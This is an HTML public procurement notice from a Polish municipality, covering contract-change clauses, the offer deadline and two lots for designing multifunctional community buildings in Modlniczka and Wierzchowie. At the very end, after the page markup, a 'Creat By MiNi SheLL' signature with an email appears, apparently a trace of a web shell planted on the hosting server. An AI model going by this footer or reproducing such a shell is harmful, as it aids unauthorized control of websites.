Wykonawcy materiałów, czy informacji bądź podjęcia decyzji zależnych od Zamawiającego, a niezbędnych do realizacji przedmiotu umowy, jak również w przypadku zaistnienia okoliczności niezależnych od Stron i niezawinionych przez Wykonawcę, a związanych z opóźnieniem w uzyskaniu od stosownych instytucji i organów niezbędnych uzgodnień, pozwoleń, decyzji itp., w terminach instrukcyjnych bądź obligatoryjnych wynikających z powszechnie obowiązujących przepisów prawa oraz inne niezawinione przez Strony przyczyny spowodowane przez siłę wyższą;f).wystąpienia konieczności wprowadzenia innych zmian, które są niezbędne do wprowadzenia, aby możliwe było zakończenie opracowania, a nie dało się ich przewidzieć w chwili zawarcia umowy oraz są korzystne dla Zamawiającego.2.W przypadkach określonych w ust. 1 przedłużenie terminu wykonania Przedmiotu umowy może nastąpić o czas niezbędny do jego wykonania, jednak nie dłużej niż o okres trwania przeszkody uniemożliwiającej wykonywanie Przedmiotu umowy. Przedłużenie terminu Zamawiający warunkuje złożeniem przez Wykonawcę stosownego wniosku o sporządzenie aneksu do umowy wraz z powołaniem się na podstawę zmiany umowy i uzasadnieniem wniosku opisującym okoliczności faktyczne.3.Zamawiający przewiduje możliwość zmiany umowy w przypadku, gdy wystąpi konieczność wprowadzenia zmian innych niż określone w ust. 1, które są niezbędne do wprowadzenia, aby było możliwe zakończenie opracowania, a nie dało się ich przewidzieć w chwili zawarcia umowy oraz są one korzystne dla Zamawiającego. W takim przypadku Strony mogą zmienić takie elementy umowy, na które powyższe okoliczności mają wpływ, w tym również mogą dokonać zmiany terminu zakończenia wykonania Przedmiotu umowy, zmiany zakresu przedmiotu umowy i zmiany wynagrodzenia. 4.Zamawiający dopuszcza możliwość zmiany § 9 ust. 4 niniejszej umowy w przypadku gdyby Zamawiający odstąpił od zamiaru realizacji zadania inwestycyjnego, które miałoby być wykonane na podstawie Przedmiotu umowy, poprzez skrócenie okresu obowiązywania rękojmi za wady Przedmiotu umowy.5.Ewentualna nieważność jednego lub kilku postanowień niniejszej umowy nie wpływa na ważność umowy w całości, a w takim przypadku Strony zastępują nieważne postanowienie postanowieniem zgodnym z celem i innymi postanowieniami umowy, bądź też postanowieniem umownym w jego pierwotnym brzmieniu w przypadku dokonania zmian umowy z naruszeniem zapisów § 11 ust. 1, 2 lub 3 niniejszej umowy.6.Wniosek Wykonawcy o zmianę treści umowy winien być zgłoszony Zamawiającemu w terminie do 7 dni licząc od dnia zaistnienia przesłanki do zmiany umowy.7.Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-02-28</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>„Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektów pod nazwą: Zadanie nr 1.Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka na dz. nr 966 w m. Modlniczka</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.1.1Przedmiotem zamówienia jest opracowanie projektu budowlanego i wykonawczego wraz z prawomocną decyzją o pozwoleniu na budowę obiektu pod nazwą „Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka”. Podlegający rozbudowie istniejący budynek posiada funkcję szatniowo-sanitarną z przeznaczeniem dla sportowców LKS Sportowiec Modlniczka. Z uwagi na uwarunkowania terenowo własnościowe oraz lokalizacyjne działki na której jest usytuowany podjęta została decyzja o jego rozbudowie tak aby mógł pełnić funkcję budynku wielofunkcyjnego w tym: - zachowana zostanie dotychczasowa funkcja szatniowo-sanitarna na parterze budynku - projektowana do rozbudowy część parterowa budynku przeznaczona zostanie dla Ochotniczej Straży Pożarnej z garażem na wozy bojowe, zaplecze socjalno-magazynowe i biuro- kondygnacja dachowa rozbudowanej części mieścić będzie salę wielofunkcyjną z zapleczem kuchennym i sanitariatami- ponadto część poddasza istniejącego budynku przeznaczona zostanie dla potrzeb KGW, natomiast pozostała jego część będzie użytkowana w sposób dotychczasowy.1.1.2.Zakres rzeczowy obejmuje:- wykonanie projektu budowlanego i wykonawczego architektury, konstrukcji, instalacji wewnętrznych wody, kanalizacji sanitarnej, instalacji elektrycznej, instalacji gazu, instalacji wentylacji mechanicznej, klimatyzacji (w sali wielofunkcyjnej i KGW), instalacji co i c.w.u. oraz kotłowni- wykonanie projektu instalacji strukturalnej, teletechnicznej, instalacji syreny alarmowej, nagłośnienia (w sali wielofunkcyjnej), monitoringu, odgromowej, wody p. poż., aranżacji wnętrz, technologii kuchni - wykonanie projektu przyłączy wod-kan. - wykonanie charakterystyki energetycznej, analizy racjonalnego wykorzystania energii- wykonanie projektu zagospodarowania terenu z uwzględnieniem zieleni- wykonanie mapy do celów projektowych- wykonanie badań geotechnicznych- zapewnienie projektantów sprawdzających projekty - uzyskanie warunków technicznych na poszczególne media (zwiększenie) - uzyskanie uzgodnień rzeczoznawców: sanepid, p.poż- skompletowanie dokumentów, przygotowanie i złożenie wniosku o pozwolenie na budowę.- uzyskanie prawomocnej decyzji o pozwoleniu na budowę- opracowanie przedmiarów i kosztorysów inwestorskich- o pracowanie STWIORB1.1.3.Zestawienie powierzchni charakterystycznych:- powierzchnia zabudowy części projektowanej - 346,64 m2- kubatura części projektowanej - 2.601,00 m3- powierzchnia całkowita budynków - 735,30 m2 - powierzchnia użytkowa części projektowanej - 456,70 m2- długość budynku projektowanego - 26,94 m - szerokość budynku projektowanego - 0,45 m- wysokość budynku projektowanego - 10,46 m- kąt pochylenia połaci dachowych - 35 st. 1.1.4 Stan istniejący zagospodarowania terenu.W stanie istniejący, na terenie objętym opracowaniem tj. działce nr 966 w Modlniczce zlokalizowane są obiekty sportowe. Na działce tej przy jej zachodniej granicy znajduje się budynek sportowy oraz trybuny o konstrukcji stalowej. Centralną część działki zajmuje boisko sportowe. Teren jest w całości ogrodzony ogrodzeniem z siatki stalowej na słupkach. Na obszarze działki nie występują drzewa wysokie. Nieliczne drzewa wysokie porastają wzdłuż północnej i wschodniej granicy działki. Działka jest uzbrojona: od strony zachodniej przebiega sieć wodociągowa i elektryczna. Ścieki sanitarne odprowadzane są do studzienki funkcjonującej kanalizacji sanitarnej. Działka jest praktycznie płaska, posiada jedynie lekki spadek w kierunku zachodnim. Zgodnie z zapisem i oznaczeniem w miejscowym planie zagospodarowania przestrzennego przedmiotowa działka częściowo znajduje się w terenie oznaczonym „US – teren urządzeń sportu i rekreacji” częściowo w terenie oznaczonym „TZ – teren zamknięty”. Zmiana miejscowa w MPZP Gminy dla tej inwestycji jest w trakcie. Istniejący wjazd na teren inwestycji z działki drogowej nr 703 (ul. Wrzosowa) zlokalizowany jest od strony zachodniej. Tam również usytuowany jest parking o nawierzchni żwirowej.1.1.5 Projektowane zagospodarowanie terenu.Projekt przewiduje przebudowę i rozbudowę budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny. Projektowana rozbudowa zlokalizowana jest do strony północnej – w miejscu istniejącego parkingu. Projektuje się przesunięcie istniejącego zjazdu z drogi KDW w stronę północną i zlokalizowanie nowego większego parkingu na 83 miejsca postojowe w północno-zachodnim narożniku działki oraz wzdłuż północnej granicy działki. Poszerzenie istniejącego zjazdu pozwoli na utworzenie strefy wejściowej w formie niewielkiego placyku od strony frontowej budynków. Istniejące trybuny planuje się przenieść na wschodnią stronę boiska, natomiast w ich miejscu planuje się nowe o konstrukcji żelbetowej usytuowane wzdłuż wschodniej elewacji budynku wielofunkcyjnego.UWAGA!1.	Wszystkie informacje zawarte w przedstawionym wyżej opisie przedmiotu zamówienia znajdują się w projekcie koncepcyjnym wielofunkcyjnego budynku w miejscowości Modlniczka który dołączony jest do dokumentów dotyczących zapytania ofertowego.2.	Badania geologiczne oraz opracowania mapy dla celów projektowych leżą po stronie Wykonawcy projektu3.	Stosowanie do zapisu zawartego w koncepcji pkt I. 2. cyt. „Zgodnie z zapisem i oznaczeniem w miejscowym planie zagospodarowania przestrzennego przedmiotowa działka częściowo znajduje się w terenie oznaczonym US "teren urządzeń sportu i rekreacji", częściowo w terenie oznaczonym TZ "teren zamknięty" i konieczna będzie dla przedmiotowej inwestycji zmiana miejscowa w MPZP Gminy.” Inwestor informuje, że zawarł umowę na opracowanie MPZP z terminem do 31.12.2020r. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71220000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">najnizsza cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doswiadczenie osób sierowanych do realizacji zamówienia </td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektów pod nazwą: Wielofunkcyjny budynek komunalny na potrzeby społeczności lokalnej na dz. nr 272 w m. Wierzchowie. ” </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 2 Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektu pod nazwą: Wielofunkcyjny budynek komunalny na potrzeby społeczności lokalnej na dz. nr 272 w m. Wierzchowie. ” Przedmiotem zamówienia jest opracowanie projektu budowlanego i wykonawczego wraz z prawomocną decyzją o pozwoleniu na budowę obiektu pod nazwą „Budynek wielofunkcyjny na potrzeby społeczności lokalnej na działce nr 272 w miejscowości Wierzchowie gmina Wielka Wieś”Zakres rzeczowy obejmuje:- wykonanie projektu budowlanego i wykonawczego architektury, konstrukcji, instalacji wewnętrznych wody, kanalizacji sanitarnej, instalacji elektrycznej, instalacji gazu, instalacji wentylacji mechanicznej, klimatyzacji (w sali wielofunkcyjnej), instalacji co i c.w.u. oraz kotłowni- wykonanie projektu instalacji strukturalnej, teletechnicznej, nagłośnienia (w sali wielofunkcyjnej), monitoringu, odgromowej, wody p. poż., aranżacji wnętrz- wykonanie projektu przyłączy wod-kan. - wykonanie charakterystyki energetycznej, analizy racjonalnego wykorzystania energii- wykonanie projektu zagospodarowania terenu z uwzględnieniem zieleni- wykonanie mapy do celów projektowych- wykonanie badań geotechnicznych- zapewnienie projektantów sprawdzających projekty - uzyskanie warunków technicznych na poszczególne media - uzyskanie uzgodnień rzeczoznawców: sanepid, p.poż- skompletowanie dokumentów, przygotowanie i złożenie wniosku o pozwolenie na budowę.- uzyskanie prawomocnej decyzji o pozwoleniu na budowę- opracowanie przedmiarów i kosztorysów inwestorskich- opracowanie STWIOR1.2.3.Przeznaczenie i program użytkowy oraz charakterystyczne parametry techniczne projektowanego budynku:Budynek służyć będzie mieszkańcom jako miejsce spotkań, zebrań wiejskich, szkoleń bądź innych wydarzeń wynikających z bieżących potrzeb społeczności lokalnej. W budynku tym planuje się:- na parterze komunikacja, kotłownia, wiatrołap, wc dla niepełnosprawnych, szatnia/magazyn, sala sala wielofunkcyjna- w poddaszu catering, wiatrołap, komunikacja, wc 2 szt. sala wielofunkcyjna- Zestawienie charakterystycznych parametrów:- kubatura budynku - 700,00 m3- powierzchnia całkowita budynku - 195,47m2 - powierzchnia netto - 130,42m2- długość budynku projektowanego - 11,92 m - szerokość budynku projektowanego - 8,02 m- wysokość budynku projektowanego - 8,52m- kąt pochylenia połaci dachowych - 40 st. 1.2.4.Konstrukcja obiektu.Planuje się budynek w konstrukcji tradycyjnej murowanej, z zastosowaniem pustaków ceramicznych lub bloczków z betonu komórkowego. W części wschodniej ściany budynku w konstrukcji monolitycznej żelbetowej z uwagi na znaczne wymiary otworów okiennych. Strop i schody wewnętrzne monolityczne. Konstrukcja więźby dachowej tradycyjna, drewniana, planowana konstrukcja jętkowa bez stolcowa. 1.2.5.Wyposażenie budowlano-instalacyjne.Planowane ogrzewanie budynku gazowe, tradycyjne. Należy zaprojektować kotłownię w obrębie dolnego poziomu budynku. Należy rozważyć zaprojektowanie instalacji wentylacji mechanicznej z uwagi na okresowe wzmożone korzystanie z obiektu (spotkania, konferencje)1.2.6.Zagospodarowanie terenu działkiZałożono dostęp do niezbędnych mediów z pobliskich sieci wodociągowej, kanalizacji sanitarnej, energetycznej i gazowej. W ramach zagospodarowania należy zapewnić utwardzenie terenu niezbędne dla prawidłowego funkcjonowania budynku. Dodatkowo należy zaprojektować taras ziemny w południowo-wschodniej części terenu inwestycji.UWAGA!1.	Wszystkie informacje zawarte w przedstawionym wyżej opisie przedmiotu zamówienia znajdują się w projekcie koncepcyjnym wielofunkcyjnego budynku w miejscowości Wierzchowie, który dołączony jest do dokumentów dotyczących zapytania ofertowego.2.	Badania geologiczne oraz opracowania mapy dla celów projektowych leżą po stronie Wykonawcy projektu<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71220000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">najniższa cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doswiadczenie osób skierowanych do realizacji zamówienia </td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com